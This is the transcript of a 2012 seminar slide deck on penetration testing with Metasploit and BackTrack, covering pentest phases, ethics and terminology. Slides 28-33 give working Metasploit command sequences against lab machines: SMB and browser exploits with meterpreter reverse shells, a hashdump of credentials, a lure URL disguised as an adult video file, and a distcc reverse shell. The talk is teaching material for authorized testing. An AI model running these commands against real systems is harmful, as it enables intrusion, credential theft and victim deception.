Your SlideShare is downloading. ×

Pentest with Metasploit

16,731

Published on

Pentest with Metasploit

Pentest with Metasploit

Published in: Technology
1 Comment
7 Likes
Statistics
Notes
  • kenapa susah sekali downloadnya yaa ??
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
16,731
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
717
Comments
1
Likes
7
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
  • 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
  • 3. Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
  • 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  • 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  • 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  • 8. << back|track overview • Let’s Watch theVideo :)
  • 9. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  • 10. << back|track overview
  • 11. << back|track overview
  • 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  • 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  • 14. MSFconsole
  • 15. MSFcli
  • 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  • 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  • 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  • 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  • 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  • 21. Meterpreter command
  • 22. Meterpreter command
  • 23. Meterpreter command
  • 24. Meterpreter command
  • 25. Meterpreter command
  • 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  • 27. OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
  • 28. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 29. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  • 30. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 31. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
  • 32. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  • 33. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
  • 34. Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
  • 35. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  • 36. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

×